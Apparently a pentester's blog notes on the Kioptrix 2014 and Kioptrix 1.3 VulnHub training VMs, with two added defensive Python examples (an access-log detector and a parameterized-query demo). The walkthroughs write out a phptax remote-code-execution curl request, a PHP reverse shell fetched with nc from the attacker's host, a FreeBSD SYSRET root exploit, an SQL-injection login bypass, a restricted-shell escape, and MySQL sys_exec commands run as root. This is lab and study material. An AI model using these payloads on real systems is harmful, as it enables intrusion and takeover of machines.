curl -H "User-Agent:Mozilla/4.0" "${target_site_to_phptax_index_path}/data/rce.php?cmd=${remote_code}"

Forgive me, I wrote it in a hurry.
For some reason the reverse shell was a struggle from here.
What finally worked was sending over a PHP reverse shell and executing it.

Kali ships with php-reverse-shell:
# cp /usr/share/webshells/php/php-reverse-shell.php reverse.php


#### change these
$VERSION = "1.0";
$ip = '10.10.10.3';  // CHANGE THIS
$port = 443;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
window 1
# nc -nlvp 8080 < reverse.php
window 2
# ./phptax_exploit.sh http://10.10.10.8:8080/phptax nc%2010.10.10.3%208080%20%3E%20reverse.php%20\&
window 1
# nc -nlvp 443
window 2
# curl -v -XGET -H "User-Agent:Mozilla/4.0" "http://10.10.10.8:8080/phptax/data/reverse.php"

Finally got a shell.

$ id
uid=80(www) gid=80(www) groups=80(www)
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

Is there anything for FreeBSD 9.0?

# searchsploit FreeBSD 9.0
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation                       | exploits/freebsd/local/28718.c
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation                 | exploits/freebsd/local/26368.c
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

There's one that looks just right, so let's try 28718.c.

# cp /usr/share/exploitdb/exploits/freebsd/local/28718.c freebsd9.0_priv.c

This program complained because the file has no line breaks, so don't forget to add them.

victim
$ wget http://10.10.10.3/freebsd9.0_priv.c
wget: not found

Seriously?
Transfer the file with nc again, then.

attacker
# nc -nlvp 8080 < freebsd9.0_priv.c
victim
$ cd /tmp
$ nc 10.10.10.3 8080 > priv.c
$ gcc priv.c
$ ./a.out
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)
$ cd /root  
$ ls
.cshrc
.history
.k5login
.login
.mysql_history
.profile
congrats.txt
folderMonitor.log
httpd-access.log
lazyClearLog.sh
monitor.py
ossec-alerts.log
$ cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one 
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targeted attacks. 

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
Its default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...


loneferret
http://www.kioptrix.com


p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by
default it would've blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part :)

Got it.
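The VM author's note above invites you to look at the logs. As an added example (not part of this write-up or of the VM), here is a small Python detector that runs over Apache access-log lines of the kind this box writes to /var/log/httpd-access.log and flags the request patterns used above: the pChart traversal, the reflected XSS probe, the phptax field/newvalue file write, and requests to a .php file under /phptax/data/. The log lines, client IPs and timestamps are constructed.

```python
"""Flag, in Apache access-log lines, the request patterns this write-up produced.

Added example; the log lines below are constructed, not taken from the VM.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: ip ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample of httpd-access.log after the steps in the write-up.
SAMPLE_LOG = """\
10.10.10.3 - - [01/May/2020:03:40:01 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1630 "-" "Mozilla/5.0"
10.10.10.3 - - [01/May/2020:03:41:12 +0000] "GET /pChart2.1.3/examples/sandbox/script/session.php?<script>alert('XSS')</script> HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.10.3 - - [01/May/2020:03:44:35 +0000] "HEAD /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E HTTP/1.1" 200 - "-" "Mozilla/4.0"
10.10.10.3 - - [01/May/2020:03:45:02 +0000] "GET /phptax/data/rce.php?cmd=id HTTP/1.1" 200 60 "-" "Mozilla/4.0"
10.10.10.5 - - [01/May/2020:03:50:00 +0000] "GET /phptax/index.php HTTP/1.1" 200 4131 "-" "Mozilla/4.0"
garbage line that does not parse
"""


def full_decode(value, rounds=3):
    """Percent-decode until stable so double-encoded payloads are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(target):
    """Return the set of rule names matching one request target (path?query)."""
    hits = set()
    decoded = full_decode(target)
    parts = urlsplit(target)
    # parse_qs does its own percent-decoding of each value
    query = parse_qs(parts.query, keep_blank_values=True)
    path = full_decode(parts.path)

    # pChart "Script" traversal: any ../ (or ..\) after decoding, wherever it sits
    if "../" in decoded or "..\\" in decoded:
        hits.add("path_traversal")
    # reflected XSS probe in the query string
    if "<script" in decoded.lower():
        hits.add("xss")
    # phptax index.php: "field" names the file under ./data, "newvalue" is its content
    if any(full_decode(v).lower().endswith(".php") for v in query.get("field", [])):
        hits.add("php_file_create")
    if any("<?" in full_decode(v) for v in query.get("newvalue", [])):
        hits.add("php_code_write")
    # ./data should only hold data files; a .php request there is a dropped file being used
    if re.search(r"/phptax/data/[^/]+\.php$", path, re.IGNORECASE):
        hits.add("webshell_request")
    return hits


def scan(lines):
    """Parse each log line and return the flagged ones as dicts."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        hits = classify(m.group("target"))
        if hits:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "target": m.group("target"), "rules": sorted(hits)})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f["ip"], f["ts"], ",".join(f["rules"]), f["target"])
```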

The end

Is it normal for exploit code to have no line breaks?

vulnhub Kioptrix 1.3 notes

kioptrix 1.3

pentest

IP scan with arp-scan -I eth0 -l

Service enumeration

# nmap -p- 10.10.10.6 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 11:14 EDT
Nmap scan report for 10.10.10.6
Host is up (0.00047s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:4F:0D:1D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 38.42 seconds
root@kali:~/EXattack/Vulunhub/kioptrix1-3# nmap -P0 -p22,80,139,445 -sV -version-all 10.10.10.6 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 11:14 EDT
Nmap scan report for 10.10.10.6
Host is up (0.00088s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:4F:0D:1D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.17 seconds

Points of interest

  • OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
  • Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
  • Samba smbd 3.X - 4.X (workgroup: WORKGROUP) ×2

Details

OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

Run of the mill?

Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)

# nikto -h 10.10.10.6
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.6
+ Target Hostname:    10.10.10.6
+ Target Port:        80
+ Start Time:         2020-04-29 03:56:20 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8672 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2020-04-29 03:56:51 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.6

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Apr 29 03:58:08 2020
URL_BASE: http://10.10.10.6/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.6/ ----
+ http://10.10.10.6/cgi-bin/ (CODE:403|SIZE:325)                                                                     
==> DIRECTORY: http://10.10.10.6/images/                                                                             
+ http://10.10.10.6/index (CODE:200|SIZE:1255)                                                                       
+ http://10.10.10.6/index.php (CODE:200|SIZE:1255)                                                                   
==> DIRECTORY: http://10.10.10.6/john/                                                                               
+ http://10.10.10.6/logout (CODE:302|SIZE:0)                                                                         
+ http://10.10.10.6/member (CODE:302|SIZE:220)                                                                       
+ http://10.10.10.6/server-status (CODE:403|SIZE:330)                                                                
                                                                                                                     
---- Entering directory: http://10.10.10.6/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.6/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Wed Apr 29 03:58:10 2020
DOWNLOADED: 4612 - FOUND: 6

First, connecting to http://10.10.10.6 brings up a login form.
Entering a single quote (') in Username and Password, an error is thrown when the quote is in Password.

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28

Putting anything in Username and injecting SQL into Password might log me in.
Entering something like 'or 1=1 or ''=' in Password gives

User admin

Oups, something went wrong with your member's page account.
Please contact your local Administrator
to fix the issue.

but the login didn't actually succeed.
Come to think of it, dirb found a john directory.
I tried Username john, Password 'or 1=1 or ''=':

Member's Control Panel
Username    :   john
Password    :   MyNameIsJohn

Looks like the login succeeded.
Let's look at the other files too.
Nothing notable in /images/.
/john/ has a mysterious PHP file, john.php.
Accessing it shows the same login form, and the login works the same way as on index.php.
Let's try whether john can log in over SSH.

# ssh john@10.10.10.6
john@10.10.10.6's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ cd ../
*** forbidden path -> "/home/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
john:~$ ls ../
*** forbidden path -> "/home/"
*** Kicked out
Connection to 10.10.10.6 closed.

john's available commands are restricted, and violating the rules gets the connection dropped.
Just call a different shell via echo.
References
SANS Cyber Security Certifications & Research
Spawning a TTY Shell
So, with rlwrap added:

# rlwrap ssh john@10.10.10.6
john@10.10.10.6's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

Now that I have a shell, let's look for a path to root.
First, let's look at the website files I couldn't see earlier.

john@Kioptrix4:~$ cd /var/www/
john@Kioptrix4:/var/www$ ls
checklogin.php  database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert

Let's go through them in order.

john@Kioptrix4:/var/www$ cat checklogin.php 
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];

// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);

//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
    session_register("myusername");
    session_register("mypassword");
    header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}

ob_end_flush();
?>
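The reason the password payload works is visible in checklogin.php: mysql_real_escape_string is applied to the username only, and the password is pasted straight into the query. As an added example (not code from the write-up or the VM), here is the same check in Python with sqlite3 standing in for MySQL, showing the query the payload produces and the bound-parameter form that stops it. The members table is constructed; only john/MyNameIsJohn comes from the write-up.

```python
"""Why the password payload in this write-up logs in, and the query shape that stops it.

Added example using sqlite3 in place of MySQL; the members table is constructed
(john/MyNameIsJohn is from the write-up, the admin row is not).
"""
import sqlite3

PAYLOAD = "'or 1=1 or ''='"   # the password value used above


def make_db():
    """In-memory stand-in for the 'members' table; passwords stored in clear, as on the box."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", [
        ("admin", "constructed-admin-password"),
        ("john", "MyNameIsJohn"),
    ])
    return conn


def escape_quotes(value):
    """Stand-in for mysql_real_escape_string (SQLite doubles quotes instead of
    backslash-escaping them). checklogin.php applies it to the username only;
    the two password lines are commented out."""
    return value.replace("'", "''")


def effective_query(username, password):
    """The SQL text the vulnerable path actually executes."""
    return ("SELECT username FROM members WHERE username='%s' and password='%s'"
            % (escape_quotes(username), password))


def vulnerable_login(conn, username, password):
    """Mirror checklogin.php: username escaped, password interpolated raw.
    Returns the usernames of the rows matched; any row at all grants login,
    because the script only tests mysql_num_rows() != 0."""
    rows = conn.execute(effective_query(username, password))
    return sorted(r[0] for r in rows)


def safe_login(conn, username, password):
    """Bound parameters: the payload is compared as a literal string and matches nothing.
    The row count check is unchanged; only the query construction differs."""
    rows = conn.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (username, password))
    return sorted(r[0] for r in rows)


if __name__ == "__main__":
    db = make_db()
    print(effective_query("john", PAYLOAD))
    print("vulnerable:", vulnerable_login(db, "john", PAYLOAD))
    print("parameterized:", safe_login(db, "john", PAYLOAD))
```

With the payload the WHERE clause becomes `username='john' and password='' or 1=1 or ''=''`, and since AND binds tighter than OR every row matches.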

Hit something good right away?
The MySQL login credentials are at the top.
That means MySQL is running with root privileges?
These articles were an eye-opener:
Command execution with a MySQL UDF | Bernardo Dag
MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux
So SQL has something called UDFs.
First,

john@Kioptrix4:/var/www$ whereis lib_mysqludf_sys 
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so

It exists, which means....
In other words......

john@Kioptrix4:/var/www$ mysql -u root   
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 71
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select sys_exec('id > /tmp/id.txt');     
+------------------------------+
| sys_exec('id > /tmp/id.txt') |
+------------------------------+
| NULL                         | 
+------------------------------+
1 row in set (0.01 sec)

mysql> select sys_exec('chmod 777 /tmp/id.txt');
+-----------------------------------+
| sys_exec('chmod 777 /tmp/id.txt') |
+-----------------------------------+
| NULL                              | 
+-----------------------------------+
1 row in set (0.01 sec)

mysql> exit
Bye
john@Kioptrix4:/var/www$ cat /tmp/id.txt 
uid=0(root) gid=0(root)

!!!!!!

john@Kioptrix4:~$ cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:loneferret
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:loneferret
fax:x:21:
voice:x:22:
cdrom:x:24:loneferret
floppy:x:25:loneferret
tape:x:26:
sudo:x:27:
audio:x:29:loneferret
dip:x:30:loneferret
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:loneferret
sasl:x:45:
plugdev:x:46:loneferret
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
dhcp:x:102:
syslog:x:103:
klog:x:104:
scanner:x:105:
nvram:x:106:
fuse:x:107:loneferret
mysql:x:108:
crontab:x:109:
mlocate:x:110:
ssh:x:111:
sambashare:x:112:loneferret
winbindd_priv:x:113:
loneferret:x:1000:
lpadmin:x:114:loneferret
admin:x:115:loneferret,john
john:x:1001:
robert:x:1002:
john@Kioptrix4:~$ mysql -u root  
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select sys_exec("usermod -aG admin john");
+------------------------------------+
| sys_exec("usermod -aG admin john") |
+------------------------------------+
| NULL                               | 
+------------------------------------+
1 row in set (0.05 sec)

mysql> exit
Bye
john@Kioptrix4:~$ sudo su
[sudo] password for john: 
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:~# cd /root/
root@Kioptrix4:~# ls
congrats.txt  lshell-0.9.12
root@Kioptrix4:~# cat congrats.txt 
Congratulations!
You've got root.

There is more than one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven't already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
loneferret

I thought about wiping root's password and logging in over SSH, but it complained about public keys or something.
Is adding john to the admin group and becoming root the easiest way?
Adding john ALL=(ALL) ALL to /etc/sudoers would also work?
Since we can run things as root and change permissions, there are probably many ways.

Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

Check the exact Samba version.
For some reason neither smbclient nor enum4linux works in my environment, so I think Metasploit is the only option.

msf5 > use auxiliary/scanner/smb/smb_version 
msf5 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_version) > set rhosts 10.10.10.6
rhosts => 10.10.10.6
msf5 auxiliary(scanner/smb/smb_version) > run

[*] 10.10.10.6:445        - Host could not be identified: Unix (Samba 3.0.28a)
[*] 10.10.10.6:445        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_version) > exit

Hmm, no idea.

The end

The question of whether launching /bin/(ba)sh as a non-root user after chmod u+s /bin/(ba)sh counts as getting root.
The problem that neither smbclient nor enum4linux works properly.